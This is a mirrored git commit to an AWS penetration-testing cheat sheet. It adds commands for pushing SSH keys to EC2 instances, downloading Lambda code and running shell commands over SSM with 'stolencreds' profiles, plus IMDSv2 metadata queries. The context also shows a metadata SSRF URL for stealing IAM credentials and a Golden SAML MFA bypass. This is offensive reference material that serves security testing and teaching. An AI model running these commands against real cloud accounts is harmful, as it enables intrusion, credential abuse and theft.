mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-21 02:38:50 +00:00
AWS EC2 Instance Connect + Lambda + SSM
This commit is contained in:
parent
9207e0204c
commit
5d87804f71
@ -14,6 +14,9 @@
|
||||
* [Admin equivalent permission](#admin-equivalent-permission)
|
||||
* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
|
||||
* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
|
||||
* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
|
||||
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
|
||||
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
|
||||
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
||||
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
||||
* [PenTest:IAMUser/KaliLinux](#)
|
||||
@ -162,6 +165,18 @@
|
||||
|
||||
## AWS - Metadata SSRF
|
||||
|
||||
> AWS released an additional security defences against the attack.
|
||||
|
||||
:warning: Only working with IMDSv1.
|
||||
Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
|
||||
|
||||
In order to usr IMDSv2 you must provide a token.
|
||||
|
||||
```powershell
|
||||
export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
|
||||
curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
|
||||
```
|
||||
|
||||
### Method for Elastic Cloud Compute (EC2)
|
||||
|
||||
Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
||||
@ -360,13 +375,37 @@ aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
|
||||
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
|
||||
```
|
||||
|
||||
## AWS - Instance Connect - Push an SSH key to EC2 instance
|
||||
|
||||
```powershell
|
||||
# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/
|
||||
$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"
|
||||
$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds
|
||||
```
|
||||
|
||||
## AWS - Lambda - Extract function's code
|
||||
|
||||
```powershell
|
||||
# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed
|
||||
$ aws lambda list-functions --profile uploadcreds
|
||||
$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
|
||||
$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
|
||||
```
|
||||
|
||||
## AWS - SSM - Command execution
|
||||
|
||||
```powershell
|
||||
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
||||
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
||||
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
||||
```
|
||||
|
||||
## AWS - Golden SAML Attack
|
||||
|
||||
https://www.youtube.com/watch?v=5dj4vOqqGZw
|
||||
https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/
|
||||
|
||||
> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user’s password. This attack also bypasses any MFA requirements.
|
||||
> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements.
|
||||
|
||||
Requirement:
|
||||
* Token-signing private key (export from personnal store using Mimikatz)
|
||||
@ -492,4 +531,6 @@ https://github.com/DenizParlak/Zeus
|
||||
* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35)
|
||||
* [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md)
|
||||
* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/)
|
||||
* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
|
||||
* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
|
||||
* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
|
||||
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
Loading…
Reference in New Issue
Block a user